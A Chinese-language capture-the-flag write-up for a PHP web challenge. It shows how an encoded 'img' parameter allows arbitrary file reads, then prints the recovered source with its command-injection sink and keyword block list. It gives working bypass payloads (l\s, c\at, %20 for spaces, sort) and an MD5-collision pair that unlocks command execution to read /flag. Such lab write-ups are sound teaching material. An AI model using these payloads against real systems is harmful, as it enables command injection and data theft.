知识点:
编码转换
命令执行
linux空格_关键字绕过
打开页面 发现url 是 /index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
有img参数和cmd参数 cmd参数是没赋值的,随便赋值为123456 页面没有反应
鼠标移动到图片下面时发现有东西,当然直接查看页面源代码也可以发现
尝试输入ls 回显变成了 forbid ~ 被禁止了
回过头来观察img参数,TXpVek5UTTFNbVUzTURabE5qYz0
很像base64编码 解码一次得到MzUzNTM1MmU3MDZlNjc= 更像base64了
再次解码 3535352e706e67 格式很像16进制字符,转为ascii字符串 得到555.png
或者直接用一把梭工具得到结果,使用ciphey 或者 cyberchef 都可以一步到位
直接访问555.png没有信息,img换成555.png也没用,cmd换成555.png也没用
尝试按照题目中的格式,对一个文件进行16进制转换,然后再进行两次base64编码 传给img参数
把index.php 按照上述操作编码得到结果 TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
传给img参数之后查看源码,复制图片对应的base64编码值,解码得到index.php源码
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixiï½ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
对cmd参数进行了正则过滤,禁止了大多数查看文件的命令,其实还可以用sort
其中的\xA0过滤了16进制为0xa0的字符,也就是空格,所以需要绕过空格,同时过滤了$,不能使用${IFS} $IFS$1这种格式,%09尝试发现不可行,可以用%20 代替空格
这里正则还过滤了很多符号 看起来 |\\|\\\\| 这个部分过滤了\ 其实并没有
|\\|\\\\| 这里先经过字符串解析为 |\|\\| 再经过正则表达式解析变成 | |\ | 所以这里其实是过滤了 |\
但是这里输入|\也会被禁止,是因为后面禁止了| 单独输入\ 是不会被过滤的
如果不清楚php字符串和正则表达式中的转义规则和操作,可以看一下我这篇文章
详解PHP正则表达式中的转义操作_php特殊字符转义-****博客文章浏览阅读1.5k次,点赞39次,收藏19次。在 PHP 正则表达式中,有许多特殊字符具有特定的意义。这些特殊字符通常用于定义匹配模式的一部分,或者改变匹配的行为.比如,如果希望匹配一个"*"字符的字面意思,就需要在模式中写为 "\*",表示匹配的是*星号本身,而不是它的特殊含义,如果要匹配 \ 反斜线本身,也需要一个转义符转义 也就是"\\" 同时反斜线在 PHP 字符串 中也有特殊含义,因此也需要反斜线 \进行转义,最后要写成 "\\\\" 下面就探究一下PHP字符串和正则表达式中的转义操作_php特殊字符转义https://blog.****.net/weixin_73904941/article/details/143189318?spm=1001.2014.3001.5501
既然没过滤符号\ 正则匹配函数用的是preg_match,因此这里的过滤都是很容易绕过的
可以使用l\s代替ls绕过匹配,在preg_match函数中效果是一样的 cat命令也可以c\at这样绕过
这里过滤了单双引号 所以不能用 l''s绕过
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
这里强制变成string类型再进行比较,如果传入的是数组结果就都转换成array了,所以不能数组绕过,而且md5还是强比较,所以进行md5碰撞,让两个值md5加密后相等
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
这里用hackbar传参我自己测试是不行的,得用burpsuite抓包传参,这里img参数的值没影响
查看根目录下文件,空格用%20代替 l\s%20/ 发现flag文件
c\at%20/flag 或者 sort%20/flag 都可以得到flag